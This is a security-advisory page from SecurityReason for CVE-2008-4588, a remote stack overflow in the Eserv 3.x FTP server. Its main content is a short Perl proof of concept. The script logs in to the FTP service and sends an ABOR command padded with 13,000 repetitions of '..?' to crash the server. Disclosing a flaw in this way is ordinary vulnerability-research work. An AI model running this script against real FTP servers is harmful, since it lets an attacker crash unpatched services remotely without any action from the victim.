|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | Eserv 3.x FTP Server (ABOR) Remote Stack Overflow PoC
|
SecurityAlert : 4415
CVE : CVE-2008-4588
CWE : CWE-119
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : liquidworm
Published : 17.10.2008
Affected Software : | etype:eserv:3.0
etype:eserv:3.25
etype:eserv:3.26 |
 Advisory Content : #!/usr/bin/perl
#
# Eserv/3.x FTP Server (ABOR) Remote Stack Overflow PoC
#
# Summary: Eserv/3.x - Mail, News, Web and Proxy Servers - Mail
# Server (SMTP, IMAP4 and POP3) - News Server (NNTP) - Web Server
# (HTTP) - FTP Server - Proxy Servers (HTTP, FTP, Socks, etc) - Finger
# Server - Built-in scheduler and dialer.
#
# Product web page: http://www.eserv.ru/ | www.etype.net/eserv/
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail.com
#
# http://www.zeroscience.org
#
# 14.10.2008
#
use Net::FTP;
$ipaddr = "127.0.0.1";
$mana = "..?" x 13000;
$user = "admin";
$pass = "nimda";
$port = 21;
$ftp = Net::FTP->new("$ipaddr", Debug => 0) || die "Cannot connect to
$ipaddr on port $port: $@";
$ftp->login($user,$pass) || die "Cannot login ", $ftp->message;
$ftp->abor($mana);
$ftp->quit;
print "\nDone!\n";
References :
http://securityreason.com/expldownload/1/4915/1 (Exploit)
http://xforce.iss.net/xforce/xfdb/45864
http://www.zeroscience.org/codes/eserv_bof.txt
http://www.securityfocus.com/bid/31753
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|